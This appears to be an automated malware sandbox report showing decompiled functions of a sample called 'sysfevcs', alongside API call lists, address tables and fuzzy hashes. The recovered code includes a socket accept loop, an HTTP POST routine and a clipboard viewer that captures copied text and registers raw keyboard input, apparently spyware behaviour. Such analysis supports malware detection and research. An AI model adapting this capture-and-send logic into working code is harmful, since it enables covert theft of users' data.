                                                                                                                                                                                                                                                                  							goto L19;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						do {
                                                                                                                                                                                                                                                                  							L19:
                                                                                                                                                                                                                                                                  							_t42 = InterlockedExchangeAdd(_t75 + 4, 0);
                                                                                                                                                                                                                                                                  							if(E0040BB80() - _t42 >= 0x1e) {
                                                                                                                                                                                                                                                                  								_t45 =  *((intOrPtr*)(_t75 + 0x260));
                                                                                                                                                                                                                                                                  								if( *((intOrPtr*)(_t75 + 0x260)) != 0xffffffff) {
                                                                                                                                                                                                                                                                  									E00409320(_t45);
                                                                                                                                                                                                                                                                  									_t81 = _t81 + 4;
                                                                                                                                                                                                                                                                  									 *((intOrPtr*)(_t75 + 0x260)) = 0xffffffff;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							_t75 =  *((intOrPtr*)(_t75 + 0x280));
                                                                                                                                                                                                                                                                  						} while (_t75 != 0);
                                                                                                                                                                                                                                                                  						goto L23;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					_t76 = _t56 + 0x20;
                                                                                                                                                                                                                                                                  					EnterCriticalSection(_t76);
                                                                                                                                                                                                                                                                  					_t70 =  *((intOrPtr*)(_t56 + 0x38));
                                                                                                                                                                                                                                                                  					if(_t70 == 0) {
                                                                                                                                                                                                                                                                  						L16:
                                                                                                                                                                                                                                                                  						LeaveCriticalSection(_t76);
                                                                                                                                                                                                                                                                  						goto L24;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					while( *((intOrPtr*)(_t70 + 0x260)) != 0xffffffff) {
                                                                                                                                                                                                                                                                  						_t70 =  *((intOrPtr*)(_t70 + 0x280));
                                                                                                                                                                                                                                                                  						if(_t70 != 0) {
                                                                                                                                                                                                                                                                  							continue;
                                                                                                                                                                                                                                                                  						} else {
                                                                                                                                                                                                                                                                  							LeaveCriticalSection(_t76);
                                                                                                                                                                                                                                                                  							goto L24;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					E0040E020(_t56, _t70, _t78);
                                                                                                                                                                                                                                                                  					goto L16;
                                                                                                                                                                                                                                                                  					L24:
                                                                                                                                                                                                                                                                  					_t33 = WaitForSingleObject( *(_t56 + 0x10), 1);
                                                                                                                                                                                                                                                                  				} while (_t33 != 0);
                                                                                                                                                                                                                                                                  				goto L25;
                                                                                                                                                                                                                                                                  			}




























                                                                                                                                                                                                                                                                  0x0040e126
                                                                                                                                                                                                                                                                  0x0040e12c
                                                                                                                                                                                                                                                                  0x0040e132
                                                                                                                                                                                                                                                                  0x0040e135
                                                                                                                                                                                                                                                                  0x0040e13f
                                                                                                                                                                                                                                                                  0x0040e147
                                                                                                                                                                                                                                                                  0x0040e2c9
                                                                                                                                                                                                                                                                  0x0040e2cf
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040e14d
                                                                                                                                                                                                                                                                  0x0040e14d
                                                                                                                                                                                                                                                                  0x0040e153
                                                                                                                                                                                                                                                                  0x0040e159
                                                                                                                                                                                                                                                                  0x0040e164
                                                                                                                                                                                                                                                                  0x0040e176
                                                                                                                                                                                                                                                                  0x0040e181
                                                                                                                                                                                                                                                                  0x0040e192
                                                                                                                                                                                                                                                                  0x0040e1a0
                                                                                                                                                                                                                                                                  0x0040e1a8
                                                                                                                                                                                                                                                                  0x0040e1b1
                                                                                                                                                                                                                                                                  0x0040e1bb
                                                                                                                                                                                                                                                                  0x0040e1bd
                                                                                                                                                                                                                                                                  0x0040e1c2
                                                                                                                                                                                                                                                                  0x0040e1c4
                                                                                                                                                                                                                                                                  0x0040e1d0
                                                                                                                                                                                                                                                                  0x0040e1d5
                                                                                                                                                                                                                                                                  0x0040e1df
                                                                                                                                                                                                                                                                  0x0040e1eb
                                                                                                                                                                                                                                                                  0x0040e1eb
                                                                                                                                                                                                                                                                  0x0040e1df
                                                                                                                                                                                                                                                                  0x0040e1c2
                                                                                                                                                                                                                                                                  0x0040e1b1
                                                                                                                                                                                                                                                                  0x0040e181
                                                                                                                                                                                                                                                                  0x0040e1f6
                                                                                                                                                                                                                                                                  0x0040e1f8
                                                                                                                                                                                                                                                                  0x0040e203
                                                                                                                                                                                                                                                                  0x0040e24c
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040e252
                                                                                                                                                                                                                                                                  0x0040e258
                                                                                                                                                                                                                                                                  0x0040e25d
                                                                                                                                                                                                                                                                  0x0040e2a1
                                                                                                                                                                                                                                                                  0x0040e2a5
                                                                                                                                                                                                                                                                  0x0040e2b1
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040e25f
                                                                                                                                                                                                                                                                  0x0040e25f
                                                                                                                                                                                                                                                                  0x0040e265
                                                                                                                                                                                                                                                                  0x0040e277
                                                                                                                                                                                                                                                                  0x0040e279
                                                                                                                                                                                                                                                                  0x0040e282
                                                                                                                                                                                                                                                                  0x0040e285
                                                                                                                                                                                                                                                                  0x0040e28a
                                                                                                                                                                                                                                                                  0x0040e28d
                                                                                                                                                                                                                                                                  0x0040e28d
                                                                                                                                                                                                                                                                  0x0040e282
                                                                                                                                                                                                                                                                  0x0040e297
                                                                                                                                                                                                                                                                  0x0040e29d
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040e25f
                                                                                                                                                                                                                                                                  0x0040e205
                                                                                                                                                                                                                                                                  0x0040e209
                                                                                                                                                                                                                                                                  0x0040e20f
                                                                                                                                                                                                                                                                  0x0040e214
                                                                                                                                                                                                                                                                  0x0040e23a
                                                                                                                                                                                                                                                                  0x0040e23b
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040e23b
                                                                                                                                                                                                                                                                  0x0040e216
                                                                                                                                                                                                                                                                  0x0040e21f
                                                                                                                                                                                                                                                                  0x0040e227
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040e229
                                                                                                                                                                                                                                                                  0x0040e22a
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040e22a
                                                                                                                                                                                                                                                                  0x0040e227
                                                                                                                                                                                                                                                                  0x0040e235
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040e2b5
                                                                                                                                                                                                                                                                  0x0040e2bb
                                                                                                                                                                                                                                                                  0x0040e2c1
                                                                                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040E12C
                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040E13F
                                                                                                                                                                                                                                                                  • WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000000,00000000), ref: 0040E159
                                                                                                                                                                                                                                                                  • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 0040E176
                                                                                                                                                                                                                                                                  • accept.WS2_32(?,?,?), ref: 0040E1A8
                                                                                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040E1F6
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 0040E209
                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0040E22A
                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0040E23B
                                                                                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040E243
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 0040E252
                                                                                                                                                                                                                                                                  • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040E265
                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0040E2A5
                                                                                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040E2AB
                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040E2BB
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.296293403.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296287218.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296308470.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296320207.0000000000412000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CriticalSection$CountTick$LeaveWait$EnterEventsObjectSingle$EnumExchangeInterlockedMultipleNetworkaccept
                                                                                                                                                                                                                                                                  • String ID: PCOI$ilci
                                                                                                                                                                                                                                                                  • API String ID: 3345448188-3762367603
                                                                                                                                                                                                                                                                  • Opcode ID: 7455252e4ff479be94a49cbb1942bce9dbcd425f8730585712822cac2a609895
                                                                                                                                                                                                                                                                  • Instruction ID: fd6fa502bc2c0ef985739ca9974dfc73087b23499b60ed651c204545790cd000
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7455252e4ff479be94a49cbb1942bce9dbcd425f8730585712822cac2a609895
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AB41DF715002109BCB20DF75DD88B5B77A8AB48720F044E7EF955BB2C2DB38E859CB99
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  C-Code - Quality: 79%
                                                                                                                                                                                                                                                                  			E0040CA80(char* _a4, char* _a8, void* _a12, long* _a16) {
                                                                                                                                                                                                                                                                  				char _v260;
                                                                                                                                                                                                                                                                  				char _v772;
                                                                                                                                                                                                                                                                  				char* _v776;
                                                                                                                                                                                                                                                                  				void* _v780;
                                                                                                                                                                                                                                                                  				intOrPtr _v792;
                                                                                                                                                                                                                                                                  				char* _v796;
                                                                                                                                                                                                                                                                  				signed short _v816;
                                                                                                                                                                                                                                                                  				intOrPtr _v820;
                                                                                                                                                                                                                                                                  				char* _v824;
                                                                                                                                                                                                                                                                  				void _v836;
                                                                                                                                                                                                                                                                  				void* _v840;
                                                                                                                                                                                                                                                                  				void* _v844;
                                                                                                                                                                                                                                                                  				void* _v848;
                                                                                                                                                                                                                                                                  				char* _v852;
                                                                                                                                                                                                                                                                  				long _v856;
                                                                                                                                                                                                                                                                  				void _v1884;
                                                                                                                                                                                                                                                                  				long _v1888;
                                                                                                                                                                                                                                                                  				void* _t102;
                                                                                                                                                                                                                                                                  				void* _t103;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_v776 = 0;
                                                                                                                                                                                                                                                                  				_v840 = 0;
                                                                                                                                                                                                                                                                  				memset( &_v836, 0, 0x38);
                                                                                                                                                                                                                                                                  				_t103 = _t102 + 0xc;
                                                                                                                                                                                                                                                                  				_v840 = 0x3c;
                                                                                                                                                                                                                                                                  				_v824 =  &_v260;
                                                                                                                                                                                                                                                                  				_v820 = 0x100;
                                                                                                                                                                                                                                                                  				_v796 =  &_v772;
                                                                                                                                                                                                                                                                  				_v792 = 0x200;
                                                                                                                                                                                                                                                                  				InternetCrackUrlA(_a4, 0, 0x10000000,  &_v840);
                                                                                                                                                                                                                                                                  				_v780 = InternetOpenA("Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)", 1, 0, 0, 0);
                                                                                                                                                                                                                                                                  				if(_v780 != 0) {
                                                                                                                                                                                                                                                                  					_v844 = InternetConnectA(_v780,  &_v260, _v816 & 0x0000ffff, 0, 0, 3, 0, 0);
                                                                                                                                                                                                                                                                  					if(_v844 != 0) {
                                                                                                                                                                                                                                                                  						_v848 = HttpOpenRequestA(_v844, "POST",  &_v772, 0, 0, 0, 0, 0);
                                                                                                                                                                                                                                                                  						if(_v848 != 0) {
                                                                                                                                                                                                                                                                  							HttpAddRequestHeadersA(_v848, _a8, 0xffffffff, 0xa0000000);
                                                                                                                                                                                                                                                                  							_v852 = "Content-Type: text/xml; charset=\"utf-8\"\r\nConnection: Close\r\nCache-Control: no-cache\r\nPragma: no-cache\r\n";
                                                                                                                                                                                                                                                                  							if(HttpSendRequestA(_v848, _v852, 0xffffffff, _a12,  *_a16) != 0) {
                                                                                                                                                                                                                                                                  								_v856 = 0;
                                                                                                                                                                                                                                                                  								while(1 != 0) {
                                                                                                                                                                                                                                                                  									_t98 = _v848;
                                                                                                                                                                                                                                                                  									if(InternetReadFile(_v848,  &_v1884, 0x400,  &_v1888) != 0 && _v1888 != 0) {
                                                                                                                                                                                                                                                                  										_v776 = E00408880(_v776, _t98, _v776, _v856 + _v1888);
                                                                                                                                                                                                                                                                  										memcpy( &(_v776[_v856]),  &_v1884, _v1888);
                                                                                                                                                                                                                                                                  										_t103 = _t103 + 0x14;
                                                                                                                                                                                                                                                                  										_v856 = _v856 + _v1888;
                                                                                                                                                                                                                                                                  										continue;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									break;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								 *_a16 = _v856;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							InternetCloseHandle(_v848);
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						InternetCloseHandle(_v844);
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					InternetCloseHandle(_v780);
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return _v776;
                                                                                                                                                                                                                                                                  			}






















                                                                                                                                                                                                                                                                  0x0040ca89
                                                                                                                                                                                                                                                                  0x0040ca93
                                                                                                                                                                                                                                                                  0x0040caa8
                                                                                                                                                                                                                                                                  0x0040caad
                                                                                                                                                                                                                                                                  0x0040cab0
                                                                                                                                                                                                                                                                  0x0040cac0
                                                                                                                                                                                                                                                                  0x0040cac6
                                                                                                                                                                                                                                                                  0x0040cad6
                                                                                                                                                                                                                                                                  0x0040cadc
                                                                                                                                                                                                                                                                  0x0040caf8
                                                                                                                                                                                                                                                                  0x0040cb11
                                                                                                                                                                                                                                                                  0x0040cb1e
                                                                                                                                                                                                                                                                  0x0040cb4a
                                                                                                                                                                                                                                                                  0x0040cb57
                                                                                                                                                                                                                                                                  0x0040cb80
                                                                                                                                                                                                                                                                  0x0040cb8d
                                                                                                                                                                                                                                                                  0x0040cba5
                                                                                                                                                                                                                                                                  0x0040cbab
                                                                                                                                                                                                                                                                  0x0040cbd7
                                                                                                                                                                                                                                                                  0x0040cbdd
                                                                                                                                                                                                                                                                  0x0040cbe7
                                                                                                                                                                                                                                                                  0x0040cc07
                                                                                                                                                                                                                                                                  0x0040cc16
                                                                                                                                                                                                                                                                  0x0040cc3f
                                                                                                                                                                                                                                                                  0x0040cc60
                                                                                                                                                                                                                                                                  0x0040cc65
                                                                                                                                                                                                                                                                  0x0040cc74
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040cc74
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040cc16
                                                                                                                                                                                                                                                                  0x0040cc88
                                                                                                                                                                                                                                                                  0x0040cc88
                                                                                                                                                                                                                                                                  0x0040cc91
                                                                                                                                                                                                                                                                  0x0040cc91
                                                                                                                                                                                                                                                                  0x0040cc9e
                                                                                                                                                                                                                                                                  0x0040cc9e
                                                                                                                                                                                                                                                                  0x0040ccab
                                                                                                                                                                                                                                                                  0x0040ccab
                                                                                                                                                                                                                                                                  0x0040ccba

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • memset.NTDLL ref: 0040CAA8
                                                                                                                                                                                                                                                                  • InternetCrackUrlA.WININET(00009E34,00000000,10000000,0000003C), ref: 0040CAF8
                                                                                                                                                                                                                                                                  • InternetOpenA.WININET(Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x),00000001,00000000,00000000,00000000), ref: 0040CB0B
                                                                                                                                                                                                                                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040CB44
                                                                                                                                                                                                                                                                  • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000000), ref: 0040CB7A
                                                                                                                                                                                                                                                                  • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0040CBA5
                                                                                                                                                                                                                                                                  • HttpSendRequestA.WININET(00000000,0040F8D0,000000FF,00009E34), ref: 0040CBCF
                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040CC0E
                                                                                                                                                                                                                                                                  • memcpy.NTDLL(00000000,?,00000000), ref: 0040CC60
                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040CC91
                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040CC9E
                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040CCAB
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.296293403.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296287218.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296308470.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296320207.0000000000412000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Internet$CloseHandleHttpRequest$Open$ConnectCrackFileHeadersReadSendmemcpymemset
                                                                                                                                                                                                                                                                  • String ID: <$Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)$POST
                                                                                                                                                                                                                                                                  • API String ID: 2761394606-2217117414
                                                                                                                                                                                                                                                                  • Opcode ID: 3fdeff464afb622b62c72841783980a28ec6984a3ef83e7d60f11a73aafb7751
                                                                                                                                                                                                                                                                  • Instruction ID: c856054e2ea53d444f21cfc80edf77a11ba1f019c23f833370997c74f21767c5
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3fdeff464afb622b62c72841783980a28ec6984a3ef83e7d60f11a73aafb7751
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BF512BB59012289BDB36CF54CD94BDA73BCAB48705F1441E9B60DBA280D778AF88CF54
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 401 403ed0-403ef2 GetWindowLongW 402 403ef4-403efb 401->402 403 403f16-403f1d 401->403 404 403f01-403f05 402->404 405 403f87-403f98 IsClipboardFormatAvailable 402->405 406 403f46-403f4c 403->406 407 403f1f 403->407 412 403f24-403f41 SetClipboardViewer SetWindowLongW 404->412 413 403f07-403f0b 404->413 410 403fa3-403fad IsClipboardFormatAvailable 405->410 411 403f9a-403fa1 405->411 408 403f66-403f6a 406->408 409 403f4e-403f64 SetWindowLongW 406->409 414 404104-40411d DefWindowProcA 407->414 415 403f82 408->415 416 403f6c-403f7c SendMessageA 408->416 409->415 418 403fb8-403fc2 IsClipboardFormatAvailable 410->418 419 403faf-403fb6 410->419 417 403fcb-403fcf 411->417 412->414 420 403f11 413->420 421 4040bd-4040fe RegisterRawInputDevices ChangeClipboardChain 413->421 415->414 416->415 423 403fd5-403fdf OpenClipboard 417->423 424 40409f-4040a3 417->424 418->417 422 403fc4 418->422 419->417 420->414 421->414 422->417 423->424 427 403fe5-403ff6 GetClipboardData 423->427 425 4040a5-4040b5 SendMessageA 424->425 426 4040bb 424->426 425->426 426->414 428 403ff8 427->428 429 403ffd-40400e GlobalLock 427->429 428->414 430 404010 429->430 431 404015-404026 429->431 430->414 432 404028-40402c 431->432 433 404049-40405c call 403ce0 431->433 434 40405e-40406e call 403e00 432->434 435 40402e-404032 432->435 441 404071-404085 GlobalUnlock CloseClipboard 433->441 434->441 437 404034 435->437 438 404036-404047 call 403c20 435->438 437->441 438->441 441->424 445 404087-40409c call 403480 call 408990 441->445 445->424
                                                                                                                                                                                                                                                                  C-Code - Quality: 94%
                                                                                                                                                                                                                                                                  			E00403ED0(struct HWND__* _a4, int _a8, int _a12, struct HWND__* _a16) {
                                                                                                                                                                                                                                                                  				struct HWND__* _v8;
                                                                                                                                                                                                                                                                  				int _v12;
                                                                                                                                                                                                                                                                  				struct HWND__* _v16;
                                                                                                                                                                                                                                                                  				void* _v20;
                                                                                                                                                                                                                                                                  				void* _v24;
                                                                                                                                                                                                                                                                  				short _v26;
                                                                                                                                                                                                                                                                  				short _v30;
                                                                                                                                                                                                                                                                  				int _v32;
                                                                                                                                                                                                                                                                  				short _v34;
                                                                                                                                                                                                                                                                  				char _v36;
                                                                                                                                                                                                                                                                  				int _v40;
                                                                                                                                                                                                                                                                  				int _v44;
                                                                                                                                                                                                                                                                  				struct HWND__* _t90;
                                                                                                                                                                                                                                                                  				struct HWND__* _t97;
                                                                                                                                                                                                                                                                  				struct HWND__* _t98;
                                                                                                                                                                                                                                                                  				void* _t129;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_v8 = GetWindowLongW(_a4, 0xffffffeb);
                                                                                                                                                                                                                                                                  				_v40 = _a8;
                                                                                                                                                                                                                                                                  				if(_v40 > 0x308) {
                                                                                                                                                                                                                                                                  					if(_v40 == 0x30d) {
                                                                                                                                                                                                                                                                  						if(_a12 != _v8) {
                                                                                                                                                                                                                                                                  							if(_v8 != 0) {
                                                                                                                                                                                                                                                                  								SendMessageA(_v8, _a8, _a12, _a16);
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  						} else {
                                                                                                                                                                                                                                                                  							_v8 = _a16;
                                                                                                                                                                                                                                                                  							SetWindowLongW(_a4, 0xffffffeb, _v8);
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						goto L38;
                                                                                                                                                                                                                                                                  					} else {
                                                                                                                                                                                                                                                                  						L38:
                                                                                                                                                                                                                                                                  						return DefWindowProcA(_a4, _a8, _a12, _a16);
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				if(_v40 == 0x308) {
                                                                                                                                                                                                                                                                  					_v12 = 0;
                                                                                                                                                                                                                                                                  					if(IsClipboardFormatAvailable(0xd) == 0) {
                                                                                                                                                                                                                                                                  						if(IsClipboardFormatAvailable(1) == 0) {
                                                                                                                                                                                                                                                                  							if(IsClipboardFormatAvailable(7) != 0) {
                                                                                                                                                                                                                                                                  								_v12 = 7;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  						} else {
                                                                                                                                                                                                                                                                  							_v12 = 1;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					} else {
                                                                                                                                                                                                                                                                  						_v12 = 0xd;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					if(_v12 == 0 || OpenClipboard(0) == 0) {
                                                                                                                                                                                                                                                                  						L34:
                                                                                                                                                                                                                                                                  						if(_v8 != 0) {
                                                                                                                                                                                                                                                                  							SendMessageA(_v8, _a8, _a12, _a16);
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					} else {
                                                                                                                                                                                                                                                                  						_v24 = GetClipboardData(_v12);
                                                                                                                                                                                                                                                                  						if(_v24 != 0) {
                                                                                                                                                                                                                                                                  							_v20 = GlobalLock(_v24);
                                                                                                                                                                                                                                                                  							if(_v20 != 0) {
                                                                                                                                                                                                                                                                  								_v16 = 0;
                                                                                                                                                                                                                                                                  								_v44 = _v12;
                                                                                                                                                                                                                                                                  								if(_v44 == 1) {
                                                                                                                                                                                                                                                                  									_t90 = E00403CE0(_v20, 0, 0);
                                                                                                                                                                                                                                                                  									_t129 = _t129 + 0xc;
                                                                                                                                                                                                                                                                  									_v16 = _t90;
                                                                                                                                                                                                                                                                  								} else {
                                                                                                                                                                                                                                                                  									if(_v44 == 7) {
                                                                                                                                                                                                                                                                  										_t97 = E00403E00(_v20, 0, 0);
                                                                                                                                                                                                                                                                  										_t129 = _t129 + 0xc;
                                                                                                                                                                                                                                                                  										_v16 = _t97;
                                                                                                                                                                                                                                                                  									} else {
                                                                                                                                                                                                                                                                  										if(_v44 == 0xd) {
                                                                                                                                                                                                                                                                  											_t98 = E00403C20(_v20, _v20, 0);
                                                                                                                                                                                                                                                                  											_t129 = _t129 + 8;
                                                                                                                                                                                                                                                                  											_v16 = _t98;
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								GlobalUnlock(_v24);
                                                                                                                                                                                                                                                                  								CloseClipboard();
                                                                                                                                                                                                                                                                  								if(_v16 != 0) {
                                                                                                                                                                                                                                                                  									E00403480(_v16);
                                                                                                                                                                                                                                                                  									E00408990(_v16);
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								goto L34;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							goto L38;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					goto L38;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				if(_v40 == 1) {
                                                                                                                                                                                                                                                                  					_v8 = SetClipboardViewer(_a4);
                                                                                                                                                                                                                                                                  					SetWindowLongW(_a4, 0xffffffeb, _v8);
                                                                                                                                                                                                                                                                  				} else {
                                                                                                                                                                                                                                                                  					if(_v40 == 2) {
                                                                                                                                                                                                                                                                  						_v36 = 0;
                                                                                                                                                                                                                                                                  						_v34 = 0;
                                                                                                                                                                                                                                                                  						_v30 = 0;
                                                                                                                                                                                                                                                                  						_v26 = 0;
                                                                                                                                                                                                                                                                  						_v36 = 1;
                                                                                                                                                                                                                                                                  						_v34 = 6;
                                                                                                                                                                                                                                                                  						_v32 = 1;
                                                                                                                                                                                                                                                                  						__imp__RegisterRawInputDevices( &_v36, 1, 0xc);
                                                                                                                                                                                                                                                                  						ChangeClipboardChain(_a4, _v8);
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				goto L38;
                                                                                                                                                                                                                                                                  			}



















                                                                                                                                                                                                                                                                  0x00403ee2
                                                                                                                                                                                                                                                                  0x00403ee8
                                                                                                                                                                                                                                                                  0x00403ef2
                                                                                                                                                                                                                                                                  0x00403f1d
                                                                                                                                                                                                                                                                  0x00403f4c
                                                                                                                                                                                                                                                                  0x00403f6a
                                                                                                                                                                                                                                                                  0x00403f7c
                                                                                                                                                                                                                                                                  0x00403f7c
                                                                                                                                                                                                                                                                  0x00403f4e
                                                                                                                                                                                                                                                                  0x00403f51
                                                                                                                                                                                                                                                                  0x00403f5e
                                                                                                                                                                                                                                                                  0x00403f5e
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00403f1f
                                                                                                                                                                                                                                                                  0x00404104
                                                                                                                                                                                                                                                                  0x0040411d
                                                                                                                                                                                                                                                                  0x0040411d
                                                                                                                                                                                                                                                                  0x00403f1d
                                                                                                                                                                                                                                                                  0x00403efb
                                                                                                                                                                                                                                                                  0x00403f87
                                                                                                                                                                                                                                                                  0x00403f98
                                                                                                                                                                                                                                                                  0x00403fad
                                                                                                                                                                                                                                                                  0x00403fc2
                                                                                                                                                                                                                                                                  0x00403fc4
                                                                                                                                                                                                                                                                  0x00403fc4
                                                                                                                                                                                                                                                                  0x00403faf
                                                                                                                                                                                                                                                                  0x00403faf
                                                                                                                                                                                                                                                                  0x00403faf
                                                                                                                                                                                                                                                                  0x00403f9a
                                                                                                                                                                                                                                                                  0x00403f9a
                                                                                                                                                                                                                                                                  0x00403f9a
                                                                                                                                                                                                                                                                  0x00403fcf
                                                                                                                                                                                                                                                                  0x0040409f
                                                                                                                                                                                                                                                                  0x004040a3
                                                                                                                                                                                                                                                                  0x004040b5
                                                                                                                                                                                                                                                                  0x004040b5
                                                                                                                                                                                                                                                                  0x00403fe5
                                                                                                                                                                                                                                                                  0x00403fef
                                                                                                                                                                                                                                                                  0x00403ff6
                                                                                                                                                                                                                                                                  0x00404007
                                                                                                                                                                                                                                                                  0x0040400e
                                                                                                                                                                                                                                                                  0x00404015
                                                                                                                                                                                                                                                                  0x0040401f
                                                                                                                                                                                                                                                                  0x00404026
